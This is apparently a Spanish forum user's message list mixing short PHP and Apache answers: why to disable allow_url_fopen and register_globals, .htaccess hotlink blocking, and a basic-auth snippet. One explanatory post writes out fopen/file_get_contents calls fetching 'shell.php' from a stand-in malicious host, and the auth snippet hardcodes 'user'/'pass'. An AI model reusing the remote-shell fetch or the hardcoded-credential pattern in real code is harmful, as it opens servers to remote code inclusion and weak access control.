Mensajes

ahora mira allow_url_fopen
deshabilita las url remotas en funciones como fopen , file_get_contents, etc
por ejemplo tu no podrias hacer esto

Código [Seleccionar] Expandir


fopen("http.//www.webmaliciosa.com/shell.php","r")
file_get_contents("http.//www.webmaliciosa.com/shell.php")


Espero haberte ayudado aunque sea un poco
Saludos.

Sigo sin entender esto, pero esto en el caso de estar habilitado comprometeria la seguridad de otros servidores no del tuyo no? pq con esto lo que haces es que tu puedas tratar urls externas como ficheros y no alreves. O esque no lo estoy entendiendo bien??

Hola, he estado leyendo sobre el tema de la seguridad en php, pero hay cosas que no he entendido bien. He leido en varios sitios que para aumentar la seguridad hay que tener deshabilitado allow_url_fopen y no entiendo porque realmente. Esto no es para que el servidor apache te permita tratar las URL como ficheros? Entonces como aumenta la seguridad si está off ?

Otra cosa que no entiendo es que tambien recomiendan desactivar register_globals, tampoco entiendo porque dejando esto en off aumenta la seguridad del servidor; ya que el impedimento que le veo a esto esque no se pueden pasar variables atraves de la url.


En fin , me gustaría que alguien me explicara esto un poco mas afondo, gracias

sip

[Ejemplo para denegar la carga externa de imágenes o link de archivos]

Esto se hace configurando el archivo .httaccess de tu servidor apache. Para evitar el hotlink de imagenes lo tendrías que configurar así:


Ejemplo para denegar la carga externa de imágenes o link de archivos

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]
RewriteRule \.(gif|jpg|zip|rar|mp3)$ - [F]

Otra opción que puedes utilizar es denegar la carga externa, pero mostrando una imágen por defecto a tú elección...

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]
RewriteRule \.(gif|jpg)$ http://www.midominio.com/imagen.gif [R,L]


Para que te funcione tienes que tener habilitado el mod rewrite, sino no te funcionará.

xD esq no me apetecia hacer un metodo, supuse que habria algun metodo ya implementado jeje

Hola, alguno me puede decir cual es el metodo que me devuelve un array con todos los items que contiene un combobox porfavor?

Joder, muchas gracías por esto pisha, a mi hermanita le va a encantar   

GRACIAS!!!

Usa esto que está simplificado y nos cuentas. Además no entiendo para que usas la 1ª condición si con la 2ª te vale.

Código [Seleccionar] Expandir

<?php
   if (($PHP_AUTH_USER!="user") || ($PHP_AUTH_PW!="pass")) {
      header('WWW-Authenticate: Basic realm="Acceso restringido"');
      header('HTTP/1.0 401 Unauthorized');
      echo 'Authorization Required.';
      exit;
   }
?>
<html>
<head>
</head>
<body>
Dentro de la zona restringida.
</body>
</html>

jejeje, solo era que nunca habia visto <?= no sabia que equivalise aun echo

tambien asi

Código [Seleccionar] Expandir

<a href="<?= $link?>">texto<a>

Estás seguro que así tambien? Para mi que no. No lo he probado, pero para mi que no tiene mucho sentido no se.